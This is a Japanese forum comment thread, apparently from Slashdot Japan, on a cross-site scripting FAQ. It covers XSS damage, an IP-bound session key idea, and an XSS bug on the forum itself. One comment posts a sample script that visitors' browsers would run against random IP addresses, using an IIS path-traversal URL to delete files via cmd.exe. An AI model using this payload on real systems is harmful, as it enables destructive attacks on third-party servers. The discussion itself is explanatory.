パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

The Cross Site Scripting FAQ」記事へのコメント

  • by Anonymous Coward
    XSSで引き起こされる被害というのは、大きく分けて
    • Cookieを盗まれる
    • ブラウザのセキュリティホールを突いてクライアントにいらん事される(ファイルを読み出されたり消されたり実行ファイルを突っ込まれたり)

    という2種類ですよね。
    前者に付いては、要は「Cookieを盗まれても大丈夫」な仕組みにしておけば問題ない。
    たとえば、セッションキーをCookieで保持するようにしているのであれば、そのセッションキーを生成する時にクライアントのIPアドレスを含むデータをMD5して作るとかすれば、他のIPアドレスからのセッションハイジャックは検出できる。

    • >* Cookieを盗まれる
      >* ブラウザのセキュリティホールを突いてクライアントにいらん事される
      >(ファイルを読み出されたり消されたり実行ファイルを突っ込まれたり)
      これはあくまでXSSで引き起こされる被害の一部です。
      ブラウザで可能なことであればほとんど出来ると思います。
      例えば、クロスサイトスクリプトの問題がある掲示板に以下のようなコー
      ドを含んだ発言を書き込めば、この掲示板を開いたブラウザは勝手に任
      意のサーバーに攻撃を仕掛けることが可能になります。
      <script>
      ip = Math.round(Math.random()*253+1)+"." + Math.round(Ma
      • コードが消えてしまったみたいなので...。
        サンプルコードはこうなります。
        <script>
        ip = Math.round(Math.random()*253+1)+"." + Math.round(Math.random()*255) + "." + Mathround(Math.eandom()*255) + ".Math.round(Math.random()*253+1);  window.open("http://"+ip+"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+*.*");
        </script>
        • ガガーン!再現してしまった。プレビューでは問題なかったのに、投稿したら問題が再現。
          #97122は、以下のように書いたのでした。(今回は全角文字にて回避)

          ========
          「コードが消えてしまった」のではなく、そのまま
          <script>...</script>
          が書き込めてしまったようですね。HTMLソースを参照。

          どうしてだろう?<script>は削除されるようになっているはずなのに。
          バグのようですが、再現方法がわからない。

          今 #96960にアクセスすると、スクリプトエラーが出るよ。
          エラーでよかった。本当に
          • 二つ目の<script>に対応する</script>が無いために、ページがそこで途切れてしまう状態にもなってしまった。
            上の「←ここには</script>を埋め込んでいます。」というのはその対策です。
            この障害の影響で、現在、「古い順」以外の表示では、異常が発生する(ページの途中がすっぽ抜けて多数のコメントが消える)状態ですので、閲覧される方はご注意を。
            親コメント

UNIXはシンプルである。必要なのはそのシンプルさを理解する素質だけである -- Dennis Ritchie

処理中...